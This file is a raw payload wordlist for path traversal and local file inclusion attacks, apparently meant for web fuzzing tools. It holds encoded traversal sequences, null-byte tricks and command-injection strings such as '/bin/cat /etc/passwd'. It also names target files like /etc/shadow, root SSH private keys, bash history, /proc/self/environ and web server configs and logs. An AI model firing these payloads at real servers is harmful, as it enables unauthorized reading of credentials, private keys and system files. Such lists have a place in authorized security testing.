/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%	25%5c..%25%5c..%00
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%		25%5c..%25%5c..%255cboot.ini
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini
\\&apos;/bin/cat%20/etc/passwd\\&apos;
\\&apos;/bin/cat%20/etc/shadow\\&apos;
../../../../../../../../conf/server.xml
/../../../../../../../../bin/id|
C:/inetpub/wwwroot/global.asa
C:\inetpub\wwwroot\global.asa
C:/boot.ini
C:\boot.ini
../../../../../../../../../../../../localstart.asp%00
../../../../../../../../../../../../localstart.asp
../../../../../../../../../../../../boot.ini%00
../../../../../../../../../../../../boot.ini
/./././././././././././boot.ini
/../../../../../../../../../../../boot.ini%00
/../../../../../../../../../../../boot.ini
/..\../..\../..\../..\../..\../..\../boot.ini
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
\..\..\..\..\..\..\..\..\..\..\boot.ini
..\..\..\..\..\..\..\..\..\..\boot.ini%00
..\..\..\..\..\..\..\..\..\..\boot.ini
/../../../../../../../../../../../boot.ini%00.html
/../../../../../../../../../../../boot.ini%00.jpg
/etc/passwd
/etc/group
/etc/hosts
/etc/motd
/etc/issue
/etc/bashrc
/etc/apache2/apache2.conf
/etc/apache2/ports.conf
/etc/apache2/sites-available/default
/etc/httpd/conf/httpd.conf
/etc/httpd/conf.d
/etc/httpd/logs/access.log
/etc/httpd/logs/access_log
/etc/httpd/logs/error.log
/etc/httpd/logs/error_log
/etc/init.d/apache2
/etc/mysql/my.cnf
/etc/nginx.conf
/opt/lampp/logs/access_log
/opt/lampp/logs/error_log
/opt/lamp/log/access_log
/opt/lamp/logs/error_log
/proc/self/environ
/proc/version
/proc/cmdline
/proc/mounts
/proc/config.gz
/root/.bashrc
/root/.bash_history
/root/.ssh/authorized_keys
/root/.ssh/id_rsa
/root/.ssh/id_rsa.keystore
/root/.ssh/id_rsa.pub
/root/.ssh/known_hosts
/usr/local/apache/htdocs/index.html
/usr/local/apache/conf/httpd.conf
/usr/local/apache/conf/extra/httpd-ssl.conf
/usr/local/apache/logs/error_log
/usr/local/apache/logs/access_log
/usr/local/apache/bin/apachectl
/usr/local/apache2/htdocs/index.html
/usr/local/apache2/conf/httpd.conf
/usr/local/apache2/conf/extra/httpd-ssl.conf
/usr/local/apache2/logs/error_log
/usr/local/apache2/logs/access_log
/usr/local/apache2/bin/apachectl
/usr/local/etc/nginx/nginx.conf
/usr/local/nginx/conf/nginx.conf
/var/apache/logs/access_log
/var/apache/logs/access.log
/var/apache/logs/error_log
/var/apache/logs/error.log
/var/log/apache/access.log
/var/log/apache/access_log
/var/log/apache/error.log
/var/log/apache/error_log
/var/log/httpd/error_log
/var/log/httpd/access_log
/var/log/nginx/access_log
/var/log/nginx/access.log
/var/log/nginx/error_log
/var/log/nginx/error.log

/.../.../.../.../.../

